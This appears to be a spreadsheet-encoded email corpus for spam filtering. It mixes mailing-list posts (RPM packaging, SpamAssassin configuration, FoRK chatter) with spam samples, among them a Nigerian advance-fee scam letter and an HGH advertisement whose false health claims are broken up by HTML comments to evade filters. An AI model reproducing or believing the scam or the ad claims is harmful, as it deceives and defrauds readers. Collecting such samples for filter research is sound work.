                         &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8Zrg9pWaKl5w8PF_jEuwtZR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1GRb6boGHCu4jNix1DPuR"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href="http://clickthru.online.com/Click?q=ea-fjLyQhV4XVqaQ3-AwQ4lAUw-5WsR" &gt;
 CA replaces four board members &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4myFO6trZxrhBm0WHthZR" &gt;
 HP ousts workers for e-mail abuse&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zGNzjyu98ZvQIzTKtR1dR" &gt;
 Group offers computer security standard&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAh2xne59NyGEI9rCM8vcR" &gt;
 VC-backed companies fusing forces &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmEaSxOq_7DQESNPe-iRR" &gt;
 Markets edge up on Intel news&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6Z4E0c-sjHpx8lOheMnlR" &gt;
 uBid to charge listing fees to sellers&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH1ymIAvywvjsK-FdLP4R" &gt;
 Tellabs warns of "murky" sales future &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzoEyNq9Uywq2NRJSBTeR" &gt;
 Banks seek freeze on WorldCom funds &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5OoTHMOzeFOPq1FsnysR" &gt;
 Motorola's net loss worst ever&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkruZXLBtDtZs6swzdON9R" &gt;
 Net watchdog blasts China Web rules &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7py5L5YJw2pAEVgnfqGsJuR" &gt;
 Yahoo strikes listing deal with CityFeet &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULw1K8jArh3Gl22vbAOyesR" &gt;
 Eleven vie for .org name&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXoNYnRGTVqS8CMB0qvsZR" &gt;
 Apple to charge for iTools services &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwFSZrUaAca9-0t3VVat9dR" &gt;
 Apple meets lowered expectations &lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4EmnhB-3X3VynhNBuCqcR" &gt;
 Moxi moves into cable boxes &lt;/a&gt;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href="http://clickthru.online.com/Click?q=26-KqPVIiMHordUwJeBBBkqU8niQ7RR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=3b-XhvVzBdMK7EMLEy9PuRg8AlPc1GyzdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxza2HKGJlh9GpMUHM3rR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIA9toGOgsPj9y-DzbW-iR"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href="http://clickthru.online.com/Click?q=7b-prT_IBZIw9xyoULbDr4q1O7VpJlR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IdqUbO6rpVb8HYULuonX9R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTaQWhQKxsIC1b2OB8OEuR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpKAfA-XYwxhOmI_uIUEksR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2HMvKMU_JaylIO7r3fxZR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWG2H7v1II81u0PT_Qv1dR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e433&amp;ISSUE=2002-07-17" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=fa-FmbN-XO3bOfEZ59F5G-GmYUJfRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Mailing addresses against spam? Re: Al'Qaeda's fantasy ideology:  Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; John Hall signs his message:
 &gt; &gt; John Hall
 &gt; &gt; 13464 95th Ave NE
 &gt; &gt; Kirkland WA 98034
 &gt;
 &gt; Is this some new "I'm not spam" signal, to include a
 &gt; valid mailing address?
 &gt;
 &gt; - Gordon
 Dear Gawd - /I/ live in Kirkland. I hope I don't wake up one day and realize
 /I/ am John Hall...
 I wonder if I can get GPS lat/long from street address... start a new
 GeoTrashing sport or something...
 Hmm... that address is only a quarter-mile from my old house... and about a
 block from a friend of mine. Weird...
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --------------090303060407010605030507
 Content-Type: text/plain; charset=us-ascii; format=flowed
 Content-Transfer-Encoding: 7bit
 Matthias Saou wrote:
  &gt; I guess/hope some other people from the list will try it out ;-)
  &gt;
  &gt; Both problems you reported (libasound.so and wrong xine dependency) are now
  &gt; fixed in the current packages.
  &gt;
  &gt; Oh, it's maybe also worth pointing out : I've implemented at last sorting
  &gt; by both last change date and alphabetically for my "build list" in the php
  &gt; code : http://freshrpms.net/builds/
  &gt;
  &gt; And yes, I accept patches/comments/suggestions about all those spec files!
 Sure thing :)
 I've added to the spec some flags to remove OSS and ISA-PNP support at
 build time if one wishes to, so is's possible to do a
 	rpmbuild --recompile &lt;rpm&gt; --without oss --without isapnp
 (I haven't included OSS in my 2.4.19, because VT82433 on my motherboard
 is not supported :( yet, and I'm too lazy to recompile the kernel :)).
 Also, having the kernel compiled by me, I have no kernel-source package
 installed.  I've added a flag "kernsrc", that also can be used
 --without, to remove the dependency for kernel-source at build time.  It
 would be nice to check the correct kernel include files actually exist
 (/lib/modules/`uname -r`/build/include/linux/*.h), though; however, I'm
 a beginner in RPM building -- is it possible to BuildRequire for a file
 not provided by a package at all?  I've googled a bit, and found no way
 to do that.
 I was also considering adding some sort of flag for the --with-cards
 option in alsa's ./configure, but don't know how to do that.  Only found
 out about --without from your first alsa-driver.spec, and existing RPM docs 
 don't help much.
 Oh, and one more thing :).  At first I've installed the first version of
 alsa-driver for 2.4.18-10, although I don't have that kernel, to supply
 the dependency for the rest of the alsa rpm's, and compiled the modules
 from source.  It created the /dev files and all.
 Then wanted to make my own rpm for 2.4.19, so now I'm trying to rpmbuild
 the alsa-kernel package.  Removed all alsa rpms, and tried my spec:
 rpmbuild --ba alsa-driver.spec.mine --without oss --without isapnp
 --without kernsrc
 But I get this:
 ==[long successful compile snipped]=====================================
 warning: File listed twice: /dev/adsp
 warning: File listed twice: /dev/amidi
 Finding  Provides: /usr/lib/rpm/find-provides
 Finding  Requires: /usr/lib/rpm/find-requires
 PreReq: /bin/sh /bin/sh rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1
 rpmlib(CompressedFileNames) &lt;= 3.0.4-1
 Requires(interp): /bin/sh /bin/sh
 Requires(rpmlib): rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1
 rpmlib(CompressedFileNames) &lt;= 3.0.4-1
 Requires(post): /bin/sh
 Requires(postun): /bin/sh
 Requires: alsa-kernel = 0.9.0rc3 /sbin/depmod
 Processing files: alsa-kernel-0.9.0rc3-fr4_2.4.19
 Finding  Provides: /usr/lib/rpm/find-provides
 Finding  Requires: /usr/lib/rpm/find-requires
 PreReq: rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1
 rpmlib(CompressedFileNames) &lt;= 3.0.4-1
 Requires(rpmlib): rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1
 rpmlib(CompressedFileNames) &lt;= 3.0.4-1
 Requires: alsa-driver = 0.9.0rc3 kernel = 2.4.19
 Checking for unpackaged file(s): /usr/lib/rpm/check-files
 /var/tmp/alsa-driver-0.9.0rc3-root
 error: Installed (but unpackaged) file(s) found:
      /etc/makedev.d/00macros
      /etc/rc.d/init.d/alsasound
 RPM build errors:
       File listed twice: /dev/adsp
       File listed twice: /dev/amidi
       Installed (but unpackaged) file(s) found:
      /etc/makedev.d/00macros
      /etc/rc.d/init.d/alsasound
 ========================================================================
 Like I said, I'm a beginned with RPM building, so I don't understand
 much of what's going on here.  The 00macros file is from the MAKEDEV
 rpm, and alsasound was supposed to be installed by alsa-driver, I think.
    It is not in the filesystem, anyway.
 I've looked in /var/tmp/alsa-driver-0.9.0rc3-root, they are there in
 etc.  For 00macros I think the part that does it is this line
 in alsa-driver.spec:
 cp -a %{_sysconfdir}/makedev.d/00macros /{buildroot}%{_sysconfdir}/makedev.d/
 And alsasound is installed by %{BUILDIDR}/Makefile.
 Oh, and I think I've forgot to mention, I'm running beta-null :).
  &gt; Matthias
 -silent
 -- 
 ... And on the seventh day, God was arrested for tresspassing.
 --------------090303060407010605030507
 Content-Type: text/plain;
  name="alsa-driver.spec.patch"
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline;
  filename="alsa-driver.spec.patch"
 6a7,17
 &gt;
 &gt; %define withoss               yes
 &gt; %{?_without_oss:%define withoss no}
 &gt;
 &gt; %define withisapnp    auto
 &gt; %{?_without_isapnp:%define withisapnp no}
 &gt;
 &gt; %define kernsrc       1
 &gt; %{?_without_kernsrc:%define kernsrc 0}
 &gt;
 &gt;
 20a32
 &gt; %if %{kernsrc}
 21a34,36
 &gt; %else
 &gt; BuildRequires: MAKEDEV
 &gt; %endif
 64c79
 &lt; %configure
 ---
 &gt; %configure --with-oss=%{withoss} --with-isapnp=%{withisapnp}
 119a135,137
 &gt; * Thu Aug 29 2002 Daniel Pavel &lt;danielpavel@myrealbox.com&gt;
 &gt; - Added OSS and ISA-PNP build-time flags.
 &gt; - Added kernel-source requirement flag.
 --------------090303060407010605030507--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Digital TV installed in 4 rooms.                       14599
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;&gt; Get up to 4 receivers installed in 4 rooms! 
 &lt;&gt; No Equipment To Buy. 
 &lt;&gt; Fist 3 Months of Free Service! - 
 &lt;&gt; Up to 170 CHANNELS of CD quality sound and picture 
 &lt;&gt; PROGRAMMING LESS EXPENSIVE than cable TV in most markets 
 You can receive FREE INSTALLATION of a Dish Network 
 Satellite TV System! You can also upgrade to a Personal Digital Video Recorder. 
 (Retail value $499 if you had to buy this!) 
 Click here to get your FREE INSTALLATION of a Dish Network satellite TV 
 System and 3 months of free service before this promotion expires: 
 http://www.proleadcom.com/discsat/index.php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</si>
  <si>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[ILUG] HELLO
</t>
  </si>
  <si>
    <t xml:space="preserve">OFFICE OF:EGNR. FEMI DANIEL
 FEDERAL MINISTRY OF WORKS AND HOUSING
 FEDERAL SECRETARIAT OFFICE COMPLEX
 IKOYI-LAGOS.
 ATTN:,                  
 First, I must solicit your strictest confidence in this transaction, this is by virtue of its nature as being utterly confidential and top secret as you were introduced to me in confidence through the Nigeria Chamber of Commerce and Industries.
 We are top officials from the Federal Ministry of Works and Housing,(FMW&amp;H), Federal Ministry of Finance and the Presidency, making up the Contract Review Panel(CRP) set up by the Federal Government of Nigeria to review contracts awarded by the past military administration. 
 In the course of our work on the CRP, we discovered this fund which resulted from grossly over - invoiced contracts which were executed for the FMW&amp;H during the last administration.The companies that executed the contracts have been duly paid and the contracts commissioned leaving the sum of US$21.4 Million floating in the escrow account of the Central Bank of Nigeria ready for payment.
 I have therefore  been mandated as a matter of trust by my colleagues in the panel to look for an overseas partner to whom we could transfer the sum of US21.4 legally subcontracting the entitlement to your company.This is bearing in mind that our civil service code of conduct forbids us from owning foreign companies or operating foreign accounts while in government service, hence the need for an overseas partner.
 We have agreed that the funds will be shared thus after it has been paid into your account.
 (1) 30% of the money will go to you for acting as the beneficiary of the fund.
 (2) 10% has been set aside as an abstract projection for reimbursement to both parties for incidental expences that may be incurred in the course of the transaction.
 (3) 60% to us the government officials (with which we intend to commence an importation business in conjunction with you)
 All logistics are in place and all modalities worked out for the smooth conclusion of the transaction within ten to fourteen days of commencement after receipt of the following information; your full names, company's name, address,details &amp; activities, telephone &amp; fax numbers.These information will enable us make the applications and lodge claims to the concerned ministries &amp; agencies in favour of your company and it is pertinent to state here that this transaction is entirely based on trust as the solar bank draft or certified cheque drawable in any of the Central Bank of Nigeria correspondent bankers around the world is going to be made in your name.
 Please acknowledge the reciept of this letter using the above e-mail or the Alternative: femi1855@aol.com to reply me. 
 Yours faithfully,
 Egnr. Femi Daniel.
 NB:Bank Account Details not necessary as preferred mode of payment is by draft or cheque. 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MAKE MONEY AT HOME
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you want to make money from home?  Are you tired
 of working for someone else? Then welcome to the 
 future.  
 http://www.lotsonet.com/homeopp/
 Due to our overwhelming growth of nearly 1,000% 
 over the last three years, we have an immediate 
 need and are willing to train and develop even 
 non-experienced individuals in local markets.
 http://www.lotsonet.com/homeopp/
 We are a 14 year old Inc 500 company.  Are you 
 willing to grow?  Are you ready to take on the
 challenges of the future?  Than we want you!
 Simply click on the link below for free information!
 No obligation whatsoever.
 http://www.lotsonet.com/homeopp/
 To be removed from this list go to:
 www.lotsonet.com/homeopp/remove.html
 2495gLue9-854NylY5891OkqI6-520HIMn3235DLKg2-154GVph3949xtsk0-058CQGC1446EgIE8-750Cl77
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: It's a small world
</t>
  </si>
  <si>
    <t xml:space="preserve">There was internet in Arleigh Beach Australia (see one end of town from
 the other) 6 years ago.
 That is when I figured the Internet was truly global ...
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Elias
 &gt; Sinderson
 &gt; Sent: Thursday, August 15, 2002 2:01 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: It's a small world
 &gt; 
 &gt; Or even "When did Somerville get the internet?"  ;-)
 &gt; 
 &gt; E
 &gt; 
 &gt; Luis Villa wrote:
 &gt; 
 &gt; &gt;On Thu, 2002-08-15 at 16:38, Jesse wrote:
 &gt; &gt;
 &gt; &gt;&gt;Strata just walked up to me in a cafe in Somerville, MA and
 &gt; &gt;&gt;asked me how I was getting net here. And _then_ we figured out
 &gt; &gt;&gt;that we have shared context.
 &gt; &gt;&gt;
 &gt; &gt;
 &gt; &gt;The obvious followup is 'there's a cafe in somerville with net
 access?'
 &gt; &gt;Luis [19 Pitman St.]
 &gt; &gt;http://xent.com/mailman/listinfo/fork
 &gt; &gt;
 &gt; 
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 Hello, jm@neteze.com&lt;BR&gt;
 &lt;BR&gt;
 As se&lt;!--5--&gt;en on NB&lt;!--D--&gt;C, CBS, and CN&lt;!--H--&gt;N, and even Opr&lt;!--D--&gt;ah!  The health&lt;br&gt;
 discove&lt;!--F--&gt;ry that actually revers&lt;!--D--&gt;es aging while burning fat,&lt;br&gt;
 with&lt;!--boy--&gt;out dieti&lt;!--D--&gt;ng or exerc&lt;!--F--&gt;ise!  This pro&lt;!--A--&gt;ven discovery has even&lt;br&gt;
 been report&lt;!--jm--&gt;ed on by the Ne&lt;!--test--&gt;w Engl&lt;!----&gt;and Jour&lt;!--F--&gt;nal of Medi&lt;!--F--&gt;cine.&lt;br&gt;
 For&lt;!--jm--&gt;get aging and d&lt;!----&gt;ieting forever!  And it's Gua&lt;!--S--&gt;ranteed!&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 * Red&lt;!--lo--&gt;uce body fat and build lean muscle WIT&lt;!--jm--&gt;HOUT EXERCISE!&lt;br&gt;
 * Enha&lt;!--jm--&gt;ce se&lt;!--la--&gt;xual perf&lt;!--hehe--&gt;ormance&lt;br&gt;
 * Rem&lt;!--jm--&gt;ove wrinkles and cellulite&lt;br&gt;
 * Lower blood pres&lt;!--jm--&gt;sure and improve choles&lt;!----&gt;terol profile&lt;br&gt;
 * Imp&lt;!--jm--&gt;rove sleep, vision and me&lt;!----&gt;mory&lt;br&gt;
 * Resto&lt;!--jm--&gt;re hair color and gro&lt;!----&gt;wth&lt;br&gt;
 * Stren&lt;!--jm--&gt;gthen the immune sys&lt;!----&gt;tem&lt;br&gt;
 * Incre&lt;!--jm--&gt;ase ener&lt;!----&gt;gy and card&lt;!----&gt;iac output&lt;br&gt;
 * Turn bac&lt;!--jm--&gt;k your body's biol&lt;!----&gt;ogical time cl&lt;!----&gt;ock 10-20 years&lt;br&gt;
 in 6 months of usage !!!&lt;br&gt;&lt;br&gt;
 &lt;a href="http://211.99.37.206:81/ultimatehgh_zeng/"&gt;FOR FRE&lt;!--o--&gt;E INFO&lt;!--you--&gt;RMATION AND G&lt;!--love--&gt;ET FREE 
 1 MON&lt;!--jm--&gt;TH SUPPLY OF HG&lt;!----&gt;H CLICK HERE&lt;/a&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;
 You are recei&lt;!--jm--&gt;ving this email as a subscr&lt;!----&gt;iber&lt;br&gt;
 to the Opt&lt;!--jm--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!--jm--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;
 just &lt;a href="http://211.99.37.206:81/ultimatehgh_zeng/remove.php?userid=jm@neteze.com"&gt; 
 Click Here&lt;/a&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [SAtalk] separate inbound and outbound
</t>
  </si>
  <si>
    <t xml:space="preserve">
 No I was just a little confused because I'm running procmail on a gateway
 and sits between the external sendmail box and internal exchange bridgehead
 server.  So there isn't any delivery to the local system.
 The only email it gets is inbound at the moment and we're looking to get rid
 of complication and go back to two boxes.  I did a test which looked like
 you guys are right about procmail, but testing is very limited due to the
 config I currently have.  It's just confusing when set up as a gateway.
 -Jason
 -----Original Message-----
 From: Stephane Lentz [mailto:Stephane.Lentz@ansf.alcatel.fr]
 Sent: Monday, September 23, 2002 2:50 PM
 To: spamassassin-talk@example.sourceforge.net
 Subject: Re: [SAtalk] separate inbound and outbound
 On Mon, Sep 23, 2002 at 02:26:34PM -0700, Jason Qualkenbush wrote:
 &gt; 
 &gt; Is there is way to separate inbound and outbound email so that I only
 check
 &gt; for spam on inbound mail and ignore the outbound?
 &gt; 
 &gt; I'm using Sendmail and running procmail on the gateway to call
 spamassassin.
 &gt; I know it more of a sendmail question, but my google searches have only
 &gt; turned up people trying to log all inbound and outbound email.
 &gt; 
 Using procmail, SpamAssassin doesn't get called for outgoing email
 (messages sent to other machines). 
 Procmail=Local Delivery Agent =&gt; inbound traffic to LOCAL machine.
 SL/
 ---
 Stephane Lentz / Alcanet International - Internet Services
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk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</si>
  <si>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Earn High Commissions for Booking Online
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;Earn High Commissions for Booking Online&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;&lt;center&gt;
 &lt;table border="0" width="600" height="491"&gt;
   &lt;tr&gt;
     &lt;td width="34%" height="87"&gt;&lt;a target="_blank" href="http://www.ntmllc.com"&gt;&lt;img
 src="http://www.mailpound.com/Images/NTM2_Ani.gif" border="0" width="120" height="74"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td width="33%" height="87"&gt;&lt;/td&gt;
     &lt;td width="33%" height="87"&gt;&lt;a target="_blank" href="http://www.mailpound.com"&gt;&lt;img
 height="31" hspace="15" src="http://www.mailpound.com/Images/MPArt4_tm.gif" width="190"
 align="right" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="100%" colspan="3" height="24"&gt;&lt;font face="Times New Roman"&gt;&lt;i&gt;&lt;span style="COLOR:
 black"&gt;&lt;font size="2"&gt;NORTHSTAR
       Travel Media, LLC&lt;span style="mso-spacerun: yes"&gt;&amp;nbsp; &lt;/span&gt;and
       MailPound.com, a division of SMART Travel Technologies, Inc.&lt;/font&gt;&lt;/span&gt;&lt;font
 size="2"&gt;&lt;span style="COLOR: black"&gt;
       provide travel professionals with information, services and marketing
       solutions&lt;/span&gt;&lt;/font&gt;&lt;/i&gt;&lt;font size="2"&gt;&amp;nbsp;&lt;O:P&gt;
       &lt;/font&gt;&lt;/font&gt;&lt;/O:P&gt;
       &lt;br&gt;
       &lt;hr&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="100%" colspan="3" height="74"&gt;&lt;b&gt;&lt;font face="Times New Roman"
 size="4"&gt;&lt;i&gt;Attention: &lt;/i&gt;&lt;br&gt;
       &lt;/font&gt;&lt;font face="Times New Roman" size="3" color="#000080"&gt;Travel
       agents, outside agents, independent agents, corporate travel agents:&lt;/font&gt;&lt;/b&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="100%" colspan="3" height="224"&gt;
       &lt;p align="center"&gt;&lt;a href="http://www.mailpound.com/pssst.htm" target="_blank"&gt;
       &lt;img border="0" src="http://www.mailpound.com/Images/PSSST.gif" width="350" height="200"
 align="center" vspace="9"&gt;&lt;br&gt;
       (Click for more
       information)&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="100%" colspan="3" height="62"&gt;&amp;nbsp;
       &lt;p&gt;&lt;font face="Arial" size="2"&gt;MailPound is a Trademark of SMART Travel
       Technologies, Inc.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;br&gt;
 &lt;/p&gt;
 &lt;p align="center"&gt;&lt;font color="#FFFFFF"&gt;&lt;img src="http://209.202.177.149/eimages/paw.gif"
 width="31" height="29"&gt;
 &lt;font color="#331172" size="2"&gt;If you do not want to receive these messages in
 the future, please&lt;strong&gt; &lt;/strong&gt;&lt;/font&gt;&lt;a
 href="http://www.mailpound.com/time/default.asp?cId=&amp;amp;sId=&amp;amp;e=fork@xent.com"
 target="_blank"&gt;&lt;font color="#331172" size="2"&gt;&lt;strong&gt;click
 here&lt;/strong&gt;&lt;/font&gt;&lt;/a&gt;.&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center" class="MsoHeader" style="tab-stops:.5in"&gt;&lt;font size="2"&gt;PLEASE
 DO NOT REPLY to this email.&amp;nbsp;&amp;nbsp;For questions or comments on this offer,
 please contact the supplier.&amp;nbsp;&amp;nbsp;&lt;br&gt;
  For all other inquiries, please email us at &lt;/font&gt;&lt;a href="mailto:support@mailpound.com"&gt;&lt;font
 color="#000080" size="2"&gt;support@mailpound.com&lt;/font&gt;&lt;/a&gt;&lt;font color="#000080" size="2"&gt;.&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WebDesignHQ Newsletter
</t>
  </si>
  <si>
    <t xml:space="preserve">We thought you may be interested in our new software release: 
 WebDesignHQ Newsletter 
 23rd of August 2002 07:10:09 PM 
 The SiteBuilder v2.0 Final-Release is now available and it has many enhanced features as well as more licensing options compared to the Pre-Release. 
 The SiteBuilder is the ultimate 'nuke module' for making money with your portal system! 
 Check out the demo online and to learn how to purchase the Full Version visit: http://www.WebDesignHQ.com 
 The WebDesignHQ Flash-SiteBuilder Software is a userfriendly community based Multimedia Flash Web Site creation tool (similar to geocities/angelfire style engine... but with Flash!). It features an automatic publishing system that enables anyone to easily build their own web site online with nothing but their web browser. 
 This software can be installed on your own web site and will provide your web site visitors or registered members the ability to create their own Multimedia Web Site which they can edit anytime using only a web browser right at your own Web Site! 
 No FTP, HTML, or Flash knowledge is required to build and customize a Web Site. 
 An excellent solution for web designers and web hosting companies who have many clients that need constant updates. 
 You can learn more about how to get this software for your own site at : http://www.webdesignhq.com
  ------------------------------------------------- 
  If you would like to unsubscribe from this 
  newsletter, just click the hyperlink below:
 http://www.webdesignhq.com/omnivore/vlist/vlist.php?action=out&amp;address=Users@iiu.taint.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] BUG: spamd --allowed-ips=[127.0.0.1 must be first]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "zeek" said:
 &gt; This was thoroughly confusing, but by playing musical chairs with the spamd
 &gt; args I smashed a bug:
 &gt; 
 &gt; OK:
 &gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1
 &gt; 27.0.0.1"
 &gt; OK:
 &gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1
 &gt; 27.0.0.1, 192.168.1.1"
 &gt; NOT OK:
